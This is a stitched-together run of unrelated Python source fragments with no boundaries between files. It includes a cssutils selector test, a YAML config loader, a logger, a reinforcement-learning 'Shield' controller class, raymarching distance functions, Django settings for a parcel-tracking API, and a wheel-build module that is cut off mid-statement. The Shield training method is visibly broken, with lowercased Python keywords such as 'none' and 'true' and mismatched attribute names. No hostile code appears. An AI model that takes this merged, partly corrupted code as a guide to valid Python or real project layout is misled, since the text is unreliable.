u'a, b' self.assertEqual(u'a, b', s.selectorText) self.assertRaises(xml.dom.SyntaxErr, s._setSelectorText, u',') # not changed as invalid! self.assertEqual(u'a, b', s.selectorText) tests = { u'*': None, u'/*1*/*': None, u'/*1*/*, a': None, u'a, b': None, u'a ,b': u'a, b', u'a , b': u'a, b', u'a, b, c': u'a, b, c', u'#a, x#a, .b, x.b': u'#a, x#a, .b, x.b', (u'[p|a], p|*', (('p', 'uri'),)): u'[p|a], p|*', } # do not parse as not complete self.do_equal_r(tests, att='selectorText') tests = { u'x|*': xml.dom.NamespaceErr, u'': xml.dom.SyntaxErr, u' ': xml.dom.SyntaxErr, u',': xml.dom.SyntaxErr, u'a,': xml.dom.SyntaxErr, u',a': xml.dom.SyntaxErr, u'/* 1 */,a': xml.dom.SyntaxErr, } # only set as not complete self.do_raise_r(tests, att='_setSelectorText') def test_reprANDstr(self): "SelectorList.__repr__(), .__str__()" sel=(u'a, p|b', { 'p': 'uri'}) s = cssutils.css.SelectorList(selectorText=sel) self.assertTrue(sel[0] in str(s)) s2 = eval(repr(s)) self.assertTrue(isinstance(s2, s.__class__)) self.assertEqual(sel[0], s2.selectorText) if __name__ == '__main__': import unittest unittest.main() #!/usr/bin/env python3 # -*- coding: utf-8 -*- """This module loads the different configurations""" # Import builtin python libraries import logging import os import sys from pathlib import Path # Import external python libraries import click import yaml # Import custom (local) python packages from . import __package_name__ as package_name from .ios_utils import divider # Source code meta data __author__ = "" __email__ = "" # Config and template path base_locations = [ os.path.join(os.path.expanduser("~"), f".{package_name}"), os.path.join(os.getcwd(), f".{package_name}"), f"/etc/{package_name}", ] config_locations = [os.path.join(base_path, "configs") for base_path in base_locations] base_file_names = ["config"] base_file_extensions = ["yaml", "yml"] file_names = [ file_name + "." + file_extension for file_name in base_file_names for file_extension in base_file_extensions ] config_files = [ os.path.join(config_location, file_name) for config_location in config_locations for file_name in file_names ] # Read configurations def _read_configs(config_file_paths=None): """ This private method reads configurations from a .yml file :param config_file_paths: Configuration files full path (default and custom) """ click.secho(f"[$] Reading configurations.....", fg="blue") for config_file in config_file_paths: with open(config_file, "r") as stream: try: defaults = yaml.load(stream, Loader=yaml.FullLoader) except Exception as err: click.secho(f"ERROR: {err}", fg="red") sys.exit(1) return defaults def load_config(config_file_paths=None): """ This function reads and load the configurations into the system :param config_file_paths: (list) A list of paths for configuration lookup :return: (dict) Merged configurations """ divider("Configurations") if config_file_paths is None: config_file_paths = config_files logging.debug(f"Default lookup paths: {config_files}") # Config finder flag file_flag = 0 permission_flag = 0 for path in config_file_paths: click.secho(f"[*] Searching configs in: [{path}].....", fg="cyan") if os.path.exists(path) and os.path.isfile(path): file_flag = 1 if os.access(path, os.F_OK) and os.access(path, os.R_OK): click.secho(f"[#] Using configs from: [{path}]", fg="green") default_config = path if os.path.exists(default_config) and os.path.isfile(default_config): permission_flag = 1 break else: click.secho(f"[x] Permission ERROR: [{path}]", fg="red") permission_flag = 0 else: file_flag = 0 if file_flag == 1 and permission_flag == 1: # Read configurations all_configs = _read_configs(config_file_paths=[default_config]) else: click.secho(f"[x] Could not locate configuration file!", fg="red") sys.exit(1) base_directory = Path(Path(default_config).parent).parent # Create "common" key at runtime all_configs["common"] = {} all_configs["common"]["base_directory"] = base_directory click.secho(f"[#] Configuration read complete!", fg="green") logging.debug(f"Configs: {all_configs}") return all_configs src/vassal_deployer/logger.py #!/usr/bin/env python """ logger setup """ import sys import logging _LOGGERS = { 'LOGGER': None, 'FILE_HANDLER': None, 'STDOUT_HANDLER': None } STDOUT_FORMATTER = logging.Formatter( "%(asctime)s;%(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) FILE_FORMATTER = logging.Formatter( "%(asctime)s;%(levelname)s;%(message)s", datefmt="%Y-%m-%d %H:%M:%S" ) def get_logger(logfile=None, stdout=True): if _LOGGERS['LOGGER']: return _LOGGERS['LOGGER'] log = logging.getLogger('vassal_deployer') log.setLevel(logging.DEBUG) if stdout and (_LOGGERS['STDOUT_HANDLER'] is None): so_handler = logging.StreamHandler(stream=sys.stdout) so_handler.setLevel(logging.DEBUG) so_handler.setFormatter(STDOUT_FORMATTER) _LOGGERS['STDOUT_HANDLER'] = so_handler if so_handler not in log.handlers: log.addHandler(so_handler) if logfile and (_LOGGERS['FILE_HANDLER'] is None): handler = logging.handlers.WatchedFileHandler(logfile) handler.setLevel(logging.DEBUG) handler.setFormatter(FILE_FORMATTER) _LOGGERS['FILE_HANDLER'] = handler if handler not in log.handlers: log.addHandler(handler) _LOGGERS['LOGGER'] = log return _LOGGERS['LOGGER'] import metrics from metrics import timeit from main import * import scipy.optimize import Environment import os import re import synthesis class Shield(object): """A safe controller for an environment. This class represents a disjunctive linear controller for some environment. That is, the controller consists of a list of pairs of polytopes and matrices. To apply the controller at a particular state, we choose a polytope that the state is in and multiply the state by the corresponding matrix. Note that a polytope is represented as a matrix A and a vector b where the polytope includes all points x such that A * x <= b. Attributes: K_list (list of matrices): The linear controllers for this shield. inv_list (list of polytopes): The spaces associated with each controller. """ def __init__(self, env, K_list=None, inv_list=None, cover_list=None, bound=20): """Initialize a new Shield. If K_list and inv_list are given, they are used as the new shield. Otherwise, the new shield is initialized empty and must be trained with train_shield(). Arguments: env (Environment): The environment under control. actor (ActorNetwork): The actor network. Keyword arguments: K_list (list of matrices): The initial controllers. inv_list (list of polytopes): The initial invariants. """ self.env = env self.K_list = [] if K_list is None else K_list self.inv_list = [] if inv_list is None else inv_list self.cover_list = [] if cover_list is None else cover_list if K_list is not None: self.set_covers(bound) self.last_shield = -1 def set_covers(self, bound=20): self.use_list = [] dt = self.env.timestep if self.env.continuous else 0.01 if isinstance(self.env, Environment.PolySysEnvironment): unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) if self.env.approx: env = (self.env.breaks, self.env.break_breaks, list(map(lambda x: x.tolist(), self.env.lower_As)), list(map(lambda x: x.tolist(), self.env.lower_Bs)), list(map(lambda x: x.tolist(), self.env.upper_As)), list(map(lambda x: x.tolist(), self.env.upper_Bs)), self.env.continuous, dt, unsafe_space) else: env = (self.env.capsule, self.env.continuous, dt, unsafe_space) else: # unsafe_space format: [(matrix, vector}] if self.env.unsafe_A is not None: unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) else: unsafe_space = [] safe_min = self.env.x_min safe_max = self.env.x_max for i in range(len(safe_min)): A1 = [[0.0] * len(safe_min)] A1[0][i] = 1.0 b1 = [safe_min[i]] unsafe_space.append((A1, b1)) A2 = [[0.0] * len(safe_max)] A2[0][i] = -1.0 b2 = [-safe_max[i]] unsafe_space.append((A2, b2)) env = (self.env.A.tolist(), self.env.B.tolist(), self.env.continuous, dt, unsafe_space) covers = [] for inv in self.cover_list: covers.append((inv[0].tolist(), inv[1].flatten().tolist()[0], inv[2].flatten().tolist()[0], inv[3].flatten().tolist()[0])) controllers = [] for k in self.K_list: controllers.append(k.tolist()) ret = synthesis.get_covers(env, controllers, covers, bound) for (A, b) in ret: self.use_list.append((np.matrix(A), np.matrix([[x] for x in b]))) @timeit def train_shield(self, old_shield, actor, bound=20): """Train a shield. This simply invokes the C++ extension, see synthesis.cpp for a more detailed description of the synthesis algorithm. This algorithm requires the old shield to use as a starting point for synthesis. Arguments: old_shield (Shield): The previous shield for this environment. """ dt = self.env.timestep if self.env.continuous else 0.01 if isinstance(self.env, Environment.PolySysEnvironment): unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) if self.env.approx: env = (self.env.breaks, self.env.break_breaks, list(map(lambda x: x.tolist(), self.env.lower_As)), list(map(lambda x: x.tolist(), self.env.lower_Bs)), list(map(lambda x: x.tolist(), self.env.upper_As)), list(map(lambda x: x.tolist(), self.env.upper_Bs)), self.env.continuous, dt, unsafe_space) else: env = (self.env.capsule, self.env.continuous, dt, unsafe_space) else: # unsafe_space format: [(matrix, vector}] if self.env.unsafe_A is not None: unsafe_space = [] for (A, b) in zip(self.env.unsafe_A, self.env.unsafe_b): unsafe_space.append((A.tolist(), np.asarray(b).flatten().tolist())) else: unsafe_space = [] safe_min = self.env.x_min safe_max = self.env.x_max for i in range(len(safe_min)): A1 = [[0.0] * len(safe_min)] A1[0][i] = 1.0 b1 = [safe_min[i]] unsafe_space.append((A1, b1)) A2 = [[0.0] * len(safe_max)] A2[0][i] = -1.0 b2 = [-safe_max[i]] unsafe_space.append((A2, b2)) env = (self.env.A.tolist(), self.env.B.tolist(), self.env.continuous, dt, unsafe_space) # We need to compute bounding boxes for these polytopes. The # polytopes are represented as a set of linear constraints. In general # we can find the maximum or minimum value for a particular dimension # i by solving a linear optimization problem with objective x_i or # -x_i and the existing constraints. covers = [] for inv in old_shield.cover_list: covers.append((inv[0].tolist(), inv[1].flatten().tolist()[0], inv[2].flatten().tolist()[0], inv[3].flatten().tolist()[0])) controllers = [] for k in old_shield.K_list: controllers.append(k.tolist()) def measure(K, space, dataset): A = np.matrix(space[0]) b = np.matrix([[x] for x in space[1]]) lower = np.matrix([[x] for x in space[2]]) upper = np.matrix([[x] for x in space[3]]) contr = np.matrix(K) grad = np.zeros_like(K) total = 0.0 its = 10 for _ in range(its): # sample an initial state from the cover of this controller iters = 0 while True: x = np.random.random_sample(lower.shape) x = lower + np.multiply(x, upper - lower) if (A * x <= b).all(): break iters += 1 if iters > 200: # This space is very low-density in the region # In this case we will just return some value because # the probability of the state of the system reaching # this space is low return (0.0, 0.0, dataset) #else: # print x # print A * x # print b length = 10 for _ in range(length): u_n = actor.predict(x.transpose()).T u_k = contr * x diff = np.linalg.norm(u_n - u_k) if isinstance(self.env, Environment.Environment): xp = self.env.A * x + self.env.B * u_k else: xp = self.env.polyf(x, u_k) if self.env.continuous: x = x + self.env.timestep * xp else: x = xp total += diff / length grad += (1.0 / length) * (u_k - u_n) * x.T return (((1.0 / its) * grad).tolist(), -total / its, dataset) ret = synthesis.synthesize_shield(env, covers, controllers, bound, measure) self.K_list = [] self.inv_list = [] self.cover_list = [] for (k, (A, b), (sA, sb, l, u)) in ret: self.K_list.append(np.matrix(k)) self.inv_list.append((np.matrix(A), np.matrix([[x] for x in b]))) self.cover_list.append((np.matrix(sA), np.matrix([[x] for x in sb]), np.matrix([[x] for x in l]), np.matrix([[x] for x in u]))) self.set_covers(bound) print("Controllers:") print(self.K_list) print("Invariants:") print(self.inv_list) print("Covers:") print(self.cover_list) def save_shield(self, model_path): """Save a shield to a file. Arguments: model_path (string): The path to save this shield to. """ # TODO raise NotImplementedError("save_shield is not yet implemented") def load_shield(self, model_path, enable_jit): """Load a shield previous saved with save_shield(). Arguments: model_path (string): The path to load the shield from. """ # TODO raise NotImplementedError("load_shield is not yet implemented") def detector(self, x, u): """Determine whether an action is unsafe under this shield. Arguments: x (np.matrix): current state u (np.matrix): current action Returns: bool: True if the action is unsafe. """ if isinstance(self.env, Environment.Environment): n = self.env.A * x + self.env.B * u else: n = self.env.polyf(x, u) if self.env.continuous: n = x + self.env.timestep * n for (A, b) in self.inv_list: if (A * n <= b).all(): # We are inside the invariant of some piece of the shield self.last_shield = -1 # print A, b, n, A * n return False #print("Shield called in state:") #print(x) #print("Next state:") #print(n) return True def call_shield(self, x): """Choose an action for a particular state. Arguments: x (np.matrix): The current state Returns: np.array: An for the current state. """ if self.last_shield >= 0: return self.K_list[self.last_shield] * x for i in range(len(self.K_list)): (A, b) = self.inv_list[i] if (A * x <= b).all(): self.last_shield = i return self.K_list[i] * x print(x) for (A, b) in self.inv_list: print(A) print(b) print(A * x) print(A * x <= b) raise RuntimeError("No appropriate controller found in shield invocation") @timeit def train_polysys_shield(self, learning_method, number_of_rollouts, simulation_steps, eq_err=1e-2, explore_mag=0.04, step_size=0.05, names=None, coffset=None, bias=False, degree=4, aggressive=False, without_nn_guide=False, enable_jit=False, nn_weight=0.0): """train shield Args: learning_method (string): learning method string number_of_rollouts (int): number of rollouts simulation_steps (int): simulation steps timestep (float, optional): timestep for continuous control eq_err (float, optional): amount of guassian error rewardf (None, optional): reward function testf (None, optional): reward function for draw controller explore_mag (float, optional): explore mag step_size (float, optional): step size names (None, optional): names of state """ """ Additional arguments in line 2 of the function signature: polyf: describe polynomial system dynamics in python polyf_to_str(K): describe polynomial system dynamics in string rewardf describe polynomial system reward function testf describe polynomial system test function unsafe_string(): describe polynomial unsafe conditions in string """ self.b_str_list = [] self.b_list = [] self.last_b_result = [] self.b = none self.initial_range_list = [] if self.k_list == []: #assert names is not none x0 = self.env.reset() def learning_oracle_continuous(x): self.k = learn_polysys_shield(self.env.polyf, self.env.state_dim, self.env.action_dim, self.env.q, self.env.r, x, eq_err, learning_method, number_of_rollouts, simulation_steps, self.actor, rewardf=self.env.rewardf, continuous=true, timestep=self.env.timestep, explore_mag=explore_mag, step_size=step_size, coffset=coffset, bias=bias, without_nn_guide=without_nn_guide, nn_weight=nn_weight) return self.k def draw_oracle_continuous(x, k): result = test_controller_helper(self.env.polyf, self.k, x, simulation_steps*shield_testing_on_x_ep_len, rewardf=self.env.testf, continuous=true, timestep=self.env.timestep, coffset=coffset, bias=bias) if (result >= 0): # find *a new piece of* controller savek(self.model_path, self.k) return result #iteratively search polcies that can cover all initial states def verification_oracle_continuous(x, initial_size, theta, k): #theta and k is useless here but required by the api #specs for initial conditions init = [] initsospoly = [] init_cnstr = [] for i in range(self.env.state_dim): init.append("init" + str(i+1) + " = (x[" + str(i+1) + \ "] - " + str(self.env.s_min[i,0]) + ")*(" + \ str(self.env.s_max[i,0]) + "-x[" + str(i+1) + \ "])") for i in range(self.env.state_dim): initsospoly.append("@variable m zinit" + str(i+1) + \ " sospoly(z)") for i in range(self.env.state_dim): init_cnstr.append(" - zinit" + str(i+1) + "*init" + \ str(i+1)) #specs for initial conditions subject to initial_size for i in range(self.env.state_dim): l = x[i,0] - initial_size[i] h = x[i,0] + initial_size[i] init.append("init" + str(self.env.state_dim+i+1) + \ " = (x[" + str(i+1) + "] - (" + str(l) + \ "))*((" + str(h) + ")-x[" + str(i+1) + "])") for i in range(self.env.state_dim): initsospoly.append("@variable m zinit" + \ str(self.env.state_dim+i+1) + " sospoly(z)") for i in range(self.env.state_dim): init_cnstr.append(" - zinit" + \ str(self.env.state_dim+i+1) + "*init" + \ str(self.env.state_dim+i+1)) #specs for unsafe condions unsafes = self.env.unsafe_property() unsafe = [] unsafesospoly = [] unsafe_cnstr = [] for i in range(len(unsafes)): unsafe.append("unsafe" + str(i+1) + " = " + unsafes[i]) for i in range(len(unsafes)): unsafesospoly.append("@variable m zunsafe" + str(i+1) + \ " sospoly(z)") for i in range(len(unsafes)): unsafe_cnstr.append(" - zunsafe" + str(i+1) + \ "*unsafe" + str(i+1)) #specs for bounded state space bound = [] boundsospoly = [] bound_cnstr = [] if self.env.bound_x_min is not none and \ self.env.bound_x_max is not none: for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: bound.append("bound" + str(i+1) + " = (x[" + \ str(i+1) + "] - " + \ str(self.env.bound_x_min[i,0]) + ")*(" + \ str(self.env.bound_x_max[i,0]) + "-x[" + \ str(i+1) + "])") for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: boundsospoly.append("@variable m zbound" + \ str(i+1) + " sospoly(z)") for i in range(self.env.state_dim): if self.env.bound_x_min[i,0] is not none and \ self.env.bound_x_max[i,0] is not none: bound_cnstr.append(" - zbound" + str(i+1) + \ "*bound" + str(i+1)) #specs for bounded environment disturbance disturbance = [] disturbancesospoly = [] disturbance_cnstr = [] if self.env.disturbance_x_min is not none and \ self.env.disturbance_x_max is not none: for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbance.append("disturbance" + str(i+1) + \ " = (d[" + str(i+1) + "] - " + \ str(self.env.disturbance_x_min[i,0]) + \ ")*(" + \ str(self.env.disturbance_x_max[i,0]) + \ "-d[" + str(i+1) + "])") for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbancesospoly.append( "@variable m zdisturbance" + str(i+1) + \ " sospoly(d)") for i in range(self.env.state_dim): if self.env.disturbance_x_min[i,0] is not none and \ self.env.disturbance_x_max[i,0] is not none: disturbance_cnstr.append(" - zdisturbance" + \ str(i+1) + "*disturbance" + str(i+1)) # now we have init, unsafe and sysdynamics for verification sos = none if self.env.bound_x_min is not none and \ self.env.bound_x_max is not none: sos = gensoswithbound(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(bound), "\n".join(initsospoly), "\n".join(unsafesospoly), "\n".join(boundsospoly), "".join(init_cnstr), "".join(unsafe_cnstr), "".join(bound_cnstr), degree=degree) elif self.env.disturbance_x_min is not none and \ self.env.disturbance_x_max is not none: sos = gensoswithdisturbance(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(disturbance), "\n".join(initsospoly), "\n".join(unsafesospoly), "\n".join(disturbancesospoly), "".join(init_cnstr), "".join(unsafe_cnstr), "".join(disturbance_cnstr), degree=degree) else: sos = gensos(self.env.state_dim, ",".join(self.env.polyf_to_str(k)), "\n".join(init), "\n".join(unsafe), "\n".join(initsospoly), "\n".join(unsafesospoly), "".join(init_cnstr), "".join(unsafe_cnstr), degree=degree) #verified = verifysos(writesos("sos.jl", sos), false, 900, verified = verifysos(writesos("sos.jl", sos), false, 300, aggressive=aggressive) print(verified) #if verified.split("#")[0].find("optimal") >= 0: if verified.split("#")[0].find("optimal") >= 0: return true, verified.split("#")[1] else: return false, none theta = (self.env.s_min, self.env.s_max) result, resultlist = verify_controller_z3(x0, theta, verification_oracle_continuous, learning_oracle_continuous, draw_oracle_continuous, continuous=true) print("shield synthesis result: {}".format(result)) if result: for (x, initial_size, inv, k) in resultlist: self.b_str_list.append(inv+"\n") self.b_list.append(barrier_certificate_str2func( inv, self.env.state_dim, enable_jit)) self.k_list.append(k) initial_range = np.array( [x - initial_size.reshape(len(initial_size), 1), x + initial_size.reshape(len(initial_size), 1)]) self.initial_range_list.append(initial_range) self.save_shield(os.path.split(self.model_path)[0]) else: self.load_shield(os.path.split(self.model_path)[0], enable_jit) @timeit def test_shield(self, actor, test_ep=1, test_step=5000, x0=None, mode="single", loss_compensation=0, shield_combo=1, mute=False): """test if shield works Args: test_ep (int, optional): test episodes test_step (int, optional): test step in each episode """ assert shield_combo > 0 assert loss_compensation >= 0 fail_time = 0 success_time = 0 fail_list = [] self.shield_count = 0 combo_remain = 0 for ep in xrange(test_ep): if x0 is not None: x = self.env.reset(x0) else: x = self.env.reset() init_x = x for i in xrange(test_step): u = np.reshape(actor.predict(np.reshape(np.array(x), \ (1, actor.s_dim))), (actor.a_dim, 1)) # safe or not if self.detector(x, u) or combo_remain > 0: if combo_remain == 0: combo_remain = shield_combo u = self.call_shield(x) if not mute: print("!shield at step {}".format(i)) combo_remain -= 1 # step x, _, terminal = self.env.step(u) # success or fail if terminal: if np.sum(np.power(self.env.xk, 2)) < self.env.terminal_err: success_time += 1 else: fail_time += 1 fail_list.append((init_x, x)) break if i == test_step-1: success_time += 1 print("----epoch: {} ----".format(ep)) print('initial state:\n', init_x, '\nterminal state:\n', x, '\nlast action:\n', self.env.last_u) print("----step: {} ----".format(i)) print('Success: {}, Fail: {}'.format(success_time, fail_time)) print('#############Fail List:###############') for (i, e) in fail_list: print('initial state:\n{}\nend state: \n{}\n----'.format(i, e)) print('shield times: {}, shield ratio: {}'.format(self.shield_count, float(self.shield_count)/(test_ep*test_step))) @timeit def shield_boundary(self, sample_ep=500, sample_step=100): """sample to find the state bound of shield Args: sample_ep (int, optional): epsoides sample_step (int, optional): step in each epsoide """ max_boundary = np.zeros([self.env.state_dim, 1]) min_boundary = np.zeros([self.env.state_dim, 1]) for ep in xrange(sample_ep): x = self.env.reset() for i in xrange(sample_step): u = self.call_shield(x) max_boundary, min_boundary = metrics.find_boundary( x, max_boundary, min_boundary) # step x, _, terminal = self.env.step(u) print('max_boundary:\n{}\nmin_boundary:\n{}'.format( max_boundary, min_boundary)) def learn_shield_gd(self, lr=0.00001, epsoides=100, steps=1000): K = np.random.random(self.env.state_dim) grad = np.zeros(self.env.state_dim) for ep in xrange(epsoides): self.env.reset() loss = 0 for step in xrange(steps): u = self.actor.predict(np.reshape(np.array(self.env.xk), (1, self.actor.s_dim))) grad += np.array(((K.dot(self.env.xk)-u).dot(self.env.xk.T)))[0] loss += np.sum(np.power((K.dot(self.env.xk)-u), 2)) self.env.step(u) K -= lr*grad print(loss) return K from functions import * import numpy as np import math # @njit(fastmath=True) # def sdf_scene(p, key): # # Return format: tuple(dist, color_number) # p = sub_vec3_n(mod_vec3_n(p, 2), 0.5 * 2) # return sdf_sphere(p, 0.3, (0.0, 0.0, 0.0, 0.0)), 0 @njit(fastmath=True) def sdf_scene(p, key): # Return format: tuple(dist, color_number) obj0 = (scaling_sdf(sdf_mandelbrot, p, key[0]), 0) return obj0 @njit(fastmath=True) def mapping_sdf(p, key): displacement = math.sin(key[3] * p[0]) * math.sin(key[3] * p[1]) * math.sin(key[3] * p[2]) * 0.25 return displacement @njit(fastmath=True) def scaling_sdf(sdf, p, scale): p = div_vec3_n(p, scale) d = sdf(p) return d * scale @njit(fastmath=True) def soft_min(a, b): k = 0.8 h = max(k - abs(a - b), 0.0) / k return min(a, b) - h ** 3 * k * (1.0 / 6.0) @njit(fastmath=True) def sdf_mandelbrot(p): zn = p hit = 0.0 r = 8.0 d = 2.0 for i in range(8): rad = length_vec3(zn) if rad > 2.0: hit = 0.5 * math.log(rad) * rad / d else: th = math.atan(length_vec2((zn[0], zn[1])) / zn[2]) phi = math.atan2(zn[1], zn[0]) rado = pow(rad, 8.0) d = pow(rad, 7.0) * 7.0 * d + 1.0 sint = math.sin(th * r) zn0 = rado * sint * math.cos(phi * r) zn1 = rado * sint * math.sin(phi * r) zn2 = rado * math.cos(th * r) zn = (zn0, zn1, zn2) zn = sum_vecs3(zn, p) return hit @njit(fastmath=True) def sdf_plane(p): return p[1] + 3.7 @njit(fastmath=True) def sdf_sphere(p, radius=0.3, delta=(0.0, 0.0, 0.0)): return math.sqrt((p[0] + delta[0]) ** 2 + (p[1] + delta[1]) ** 2 + (p[2] + delta[2]) ** 2) - radius @njit(fastmath=True) def sdf_octahedron(p): p = (abs(p[0]), abs(p[1]), abs(p[2])) return (p[0] + p[1] + p[2] - 0.1) * 0.57735027 @njit(fastmath=True, cache=True) def sdf_torus(p): #, time): # p = sum_vecs3(p, (0., -time * 2., -time)) # p = sub_vec3_n(mod_vec3_n(p, 8), 0.5 * 8) tmp1 = length_vec2((p[0], p[1])) return length_vec2((tmp1 - 0.6, p[2])) - 0.2 @njit(fastmath=True) def sdf_cube(p, d=(0,0,0)): b, r = (0.4, 0.4, 0.4), 0.4 q = (abs(p[0] + d[0]) - b[0], abs(p[1] + d[1]) - b[1], abs(p[2] + d[2]) - b[2]) return max((q[0], q[1], q[2], 0)) + min(max(q[0], max(q[1], q[2])), 0)""" A collection of software development tools. """ __author__ = '' track17/settings.py0 from django.conf import settings __all__ = ( 'TRACK17_API_KEY', 'TRACK17_API_KEY_FUNCTION', 'TRACK17_COUNTRIES_URL', 'TRACK17_CARRIERS_URL' ) TRACK17_API_KEY = getattr(settings, 'TRACK17_API_KEY', '') TRACK17_API_KEY_FUNCTION = getattr(settings, 'TRACK17_API_KEY_FUNCTION', None) TRACK17_COUNTRIES_URL = getattr( settings, 'TRACK17_COUNTRIES_URL', 'https://www.17track.net/en/apicountry' ) TRACK17_CARRIERS_URL = getattr( settings, 'TRACK17_CARRIERS_URL', 'https://www.17track.net/en/apicarrier' ) # -*- coding: utf-8 -*- # # (C) Copyright 2021 Karellen, Inc. (https://www.karellen.co/) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import contextlib import itertools import os import stat import warnings from distutils.cmd import Command from distutils.command.build_scripts import build_scripts from distutils.command.install_data import install_data from distutils.command.install_headers import install_headers from distutils.util import convert_path from glob import glob from setuptools.command.build_py import build_py from setuptools.command.egg_info import egg_info, manifest_maker, FileList from setuptools.command.install import install from setuptools.command.install_lib import install_lib from setuptools.command.install_scripts import install_scripts from wheel.bdist_wheel import bdist_wheel as _bdist_wheel, python_tag from wheel.vendored.packaging import tags from wheel_axle.bdist_axle._file_utils import copy_link, copy_tree from wheel_axle.runtime._symlinks import write_symlinks_file from wheel_axle.runtime.constants import AXLE_LOCK_FILE, SYMLINKS_FILE __version__ = "${dist_version}" WHEEL_AXLE_DEPENDENCY = "wheel-axle-runtime<1.0" class SymlinkAwareCommmand(Command): def initialize_options(self): super().initialize_options() self._symlinks = [] def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1, link=None, level=1): """Copy a file respecting verbose, dry-run and force flags. (The former two default to whatever is in the Distribution object, and the latter defaults to false for commands that don't define it.)""" if os.path.islink(infile): out = copy_link(infile, outfile, not self.force, dry_run=self.dry_run) self._symlinks.append(out) return out[0], 0 return super().copy_file(infile, outfile, preserve_mode=preserve_mode, preserve_times=preserve_times, link=link, level=level) def copy_tree(self, infile, outfile, preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1): """Copy an entire directory tree respecting verbose, dry-run, and force flags. """ output, symlinks = copy_tree(infile, outfile, preserve_mode, preserve_times, preserve_symlinks, not self.force, dry_run=self.dry_run) self._symlinks.extend(symlinks) return output def get_symlinks(self): return self._symlinks class InstallData(SymlinkAwareCommmand, install_data): def run(self): super().run() symlinks = set(self.get_symlinks()) outfiles = list(self.outfiles) for idx, f in enumerate(outfiles): if f in symlinks: del self.outfiles[idx] class InstallLib(SymlinkAwareCommmand, install_lib): def copy_tree( self, infile, outfile, preserve_mode=1, preserve_times=1, preserve_symlinks=0, level=1 ): assert preserve_mode and preserve_times and not preserve_symlinks exclude = self.get_exclusions() if not exclude: return super().copy_tree(infile, outfile) # Exclude namespace package __init__.py* files from the output from setuptools.archive_util import unpack_directory from distutils import log outfiles = [] def pf(src, dst): if dst in exclude: log.warn("Skipping installation of %s (namespace package)", dst) return False if os.path.islink(src): link_dest = os.readlink(src) link_dest_isdir = os.path.isdir(os.path.join(os.path.dirname(src), link_dest)) log.info("registering link %s (%s) -> %s", src, link_dest, dst) self._symlinks.append((dst, link_dest, link_dest_isdir)) return False else: log.info("copying %s -> %s", src, os.path.dirname(dst)) outfiles.append(dst) return dst unpack_directory(infile, outfile, pf) return outfiles def get_symlinks(self): symlinks = super().get_symlinks() exclude = self.get_exclusions() if exclude: return [f for f in symlinks if f[0] not in exclude] return symlinks class InstallHeaders(SymlinkAwareCommmand, install_headers): pass class InstallScripts(SymlinkAwareCommmand, install_scripts): pass class BuildPy(build_py): def make_writable(self, target): if os.path.isfile(target): os.chmod(target, os.stat(target).st_mode | stat.S_IWRITE) def build_package_data(self): """Copy data files into build directory""" for package, src_dir, build_dir, filenames in self.data_files: for filename in filenames: target = os.path.join(build_dir, filename) self.mkpath(os.path.dirname(target)) srcfile = os.path.join(src_dir, filename) outf, copied = self.copy_file(srcfile, target) self.make_writable(target) srcfile = os.path.abspath(srcfile) def copy_file(self, infile, outfile, preserve_mode=1, preserve_times=1, link=None, level=1): """Copy a file respecting verbose, dry-run and force flags. (The former two default to whatever is in the Distribution object, and the latter defaults to false for commands that don't define it.)""" if os.path.islink(infile): out = copy_link(infile, outfile, not self.force, dry_run=self.dry_run, reproduce_link=True) return out[0], 1 return super().copy_file(infile, outfile, preserve_mode=preserve_mode, preserve_times=preserve_times, link=link, level=level) def find_data_files(self, package, src_dir): """Return filenames for package's data files in 'src_dir'""" patterns = self._get_platform_patterns( self.package_data, package, src_dir, ) globs_expanded = map(glob, patterns) # flatten the expanded globs into an iterable of matches globs_matches = itertools.chain.from_iterable(globs_expanded) glob_files = filter(lambda x: os.path.isfile(x) or os.path.islink(x), globs_matches) files = itertools.chain( self.manifest_files.get(package, []), glob_files, ) return self.exclude_data_files(package, src_dir, files) class EggInfo(SymlinkAwareCommmand, egg_info): def find_sources(self): """Generate SOURCES.txt manifest file""" manifest_filename = os.path.join(self.egg_info, "SOURCES.txt") mm = ManifestMaker(self.distribution) mm.manifest = manifest_filename mm.run() self.filelist = mm.filelist class ManifestMaker(manifest_maker): def run(self): self.filelist = SymlinkAwareFileList() if not os.path.exists(self.manifest): self.write_manifest() # it must exist so it'll get in the list self.add_defaults() if os.path.exists(self.template): self.read_template() self.add_license_files() self.prune_file_list() self.filelist.sort() self.filelist.remove_duplicates() self.write_manifest() class SymlinkAwareFileList(FileList): def _safe_path(self, path): if os.path.islink(path): return True else: return super()._safe_path(path) class BuildScripts(SymlinkAwareCommmand, build_scripts): def copy_scripts(self): scripts = list(self.scripts) self.scripts.clear() symlinks = [] for script in scripts: script = convert_path(script) if os.path.exists(script) and os.path.islink(script): link_dest = os.readlink(script) link_dest_isdir = os.path.isdir(os.path.join(os.path.dirname(script), link_dest)) outfile = os.path.join(self.build_dir, os.path.basename(script)) symlinks.append((link_dest, outfile, link_dest_isdir)) else: self.scripts.append(script) try: outfiles, updated_files = super().copy_scripts() for link_dest, outfile, link_dest_isdir in symlinks: if 